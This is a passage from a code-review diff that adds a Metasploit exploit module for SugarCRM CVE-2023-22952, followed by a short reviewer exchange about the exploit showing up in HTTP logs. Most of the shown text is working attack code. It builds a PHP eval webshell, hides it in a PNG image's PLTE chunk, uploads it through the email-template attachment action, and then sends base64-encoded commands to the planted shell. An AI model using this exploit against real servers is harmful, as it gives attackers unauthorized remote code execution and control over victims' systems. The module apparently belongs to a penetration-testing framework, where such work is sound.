modules/exploits/multi/http/sugarcrm_webshell_cve_2023_22952.rb

```diff
@@ -0,0 +1,238 @@
+        'user_name' => user_name.to_s,
+        'user_password' => user_password.to_s
+      }
+    })
+    if res && res.code == 500 && !res.body.blank?
+      return true
+    else
+      return false
+    end
+  end
+
+  def upload_webshell
+    # randomize file name and extension if option WEBSHELL is not set
+    file_ext = ['phar', 'phtml']
+    if datastore['WEBSHELL'].blank?
+      @webshell_name = "#{Rex::Text.rand_text_alpha(8..16)}.#{file_ext.sample}"
+    else
+      @webshell_name = datastore['WEBSHELL'].to_s
+    end
+
+    # select webshell depending on the target setting (PHP or others).
+    @post_param = Rex::Text.rand_text_alphanumeric(1..8)
+    @get_param = Rex::Text.rand_text_alphanumeric(1..8)
+
+    if target['Type'] == :php
+      payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"
+    else
+      payload = "<?=$_GET[\'#{@get_param}\'](base64_decode($_POST[\'#{@post_param}\']));?>"
+    end
+
+    # inject PHP payload into the PLTE chunk of the PNG image
+    png_webshell = inject_php_payload_png(payload, injection_method: 'PLTE')
+    if png_webshell.nil?
+      return false
+    end
+
+    # construct multipart form data
+    form_data = Rex::MIME::Message.new
+    form_data.add_part('AttachFiles', nil, nil, 'form-data; name="action"')
+    form_data.add_part('EmailTemplates', nil, nil, 'form-data; name="module"')
+    form_data.add_part(png_webshell.to_s, 'image/png', 'binary', "form-data; name=\"file\"; filename=\"#{@webshell_name}\"")
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'index.php'),
+      'cookie' => @phpsessid.to_s,
+      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",
+      'data' => form_data.to_s
+    })
+    if res && res.code == 200 && !res.body.blank?
+      # parse HTML to find the webshell name embedded in a table that indicates a successful upload
+      html = res.get_html_document
+      if html.at("td[contains(\"#{@webshell_name}\")]")
+        return true
+      else
+        return false
+      end
+    else
+      return false
+    end
+  end
+
+  def execute_php(cmd, _opts = {})
+    payload = Base64.strict_encode64(cmd)
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'cache', 'images', @webshell_name),
+      'cookie' => @phpsessid.to_s,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        @post_param => payload
+      }
+    })
+  end
+
+  def execute_command(cmd, _opts = {})
+    payload = Base64.strict_encode64(cmd)
+    php_cmd_function = datastore['COMMAND']
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'cache', 'images', @webshell_name),
+      'cookie' => @phpsessid.to_s,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_get' => {
+        @get_param => php_cmd_function
```

Comment:
One concern with this is that this is going to be very obvious in logs. A request to a webpage that now suddenly starts mentioning things like shell_exec and passthrough in the parameters is going to look awfully suspicious in the HTTP logs.

Reply:
Yeah. Good point, but anyhow executing PNG images with a `phar` or `phtml` extension is already a red flag in the logs 😉